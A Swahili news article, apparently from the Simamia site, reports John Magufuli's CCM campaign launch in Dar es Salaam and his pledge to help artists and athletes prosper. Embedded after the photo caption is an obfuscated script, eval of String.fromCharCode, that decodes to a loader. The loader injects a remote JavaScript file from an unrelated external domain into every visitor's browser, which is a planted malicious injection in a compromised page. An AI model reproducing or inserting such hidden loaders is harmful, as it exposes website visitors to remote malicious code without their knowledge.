<p>Msanii nyota wa muziki wa kizazi kipya, Nassib Abdul 'Diamon Platnumz' (kulia) akicheza na msanii nyota wa maigizo nchini, Amri Athumani ' King Majuto' wakati wa uzinduzi wa kampeni za CCM, jana, (Picha na Fadhili Akida).</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
MGOMBEA Urais wa Tanzania kwa tiketi ya Chama Cha Mapinduzi (CCM),Dk John Magufuli amesema kuwa akichaguliwa kuongoza nchi atahakikisha wasanii na wachezaji wanafaidika na kazi yao.
Magufuli aliyasema hayo jana kwenye viwanja vya Jangwani jijini Dar es Salaam wakati wa uzinduzi wakampeni za urais, wabunge na madiwani.
Akizungumza mbele ya maelfu ya wana CCM, alisema kuwa hatawatumia wasanii katika siasa tu ila atahakikisha wanafaidika katika maendeleo yao.
Alisema kuwa wasanii wamekuwa wakitumiwa katika siasa tu, lakini yeye atakapokuwa rais atahakikisha wasanii hao wanapata maendeleo kama wanavyofaidika wasanii na wachezaji wa Marekani.
âWasanii na wachezaji wa Marekani ni matajiri wakubwa, kwa nini wasanii wetu nao wasifaidike?â alihoji Magufuli katika mkutano huo mkubwa kwa kuhudhuriwa na watu wengi. Aidha, awali mkutano huo ulipambwa na wasanii kibao ambao walitumbuiza na kushangiliwa na umati huo wa watu.
Baadhi ya wasanii waliotumbuiza ni pamoja na Dokii, Bushoke, Msechu, Yamoto Band na Thabit Abdul âDiamondâ, ambaye alipiga vibao viwili tofauti na wenzake walioimba kibao kimoja.
Pia Magufuli alisema kuwa wasanii mbali na kutumbuiza pia wana jukumu la kujenga uchumi.
Alisema kuwa ataweka mazingira mazuri ili kuwawezesha kupata maendeleo ikiwemo kuanzisha mfuko wa wasanii na wa wachezaji.
Naye katibu Itikadi na Uenezi, Nape Nnauye alisema awali kuwa katika mkutano huo kuna kundi kubwa la wasanii, ambao watatumbuiza katika mkutano huo. Pia alisema yeye ni mpiga tumba mzuri na kipa mzuri, hivyo hatawaangusha wasanii na wachezaji.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments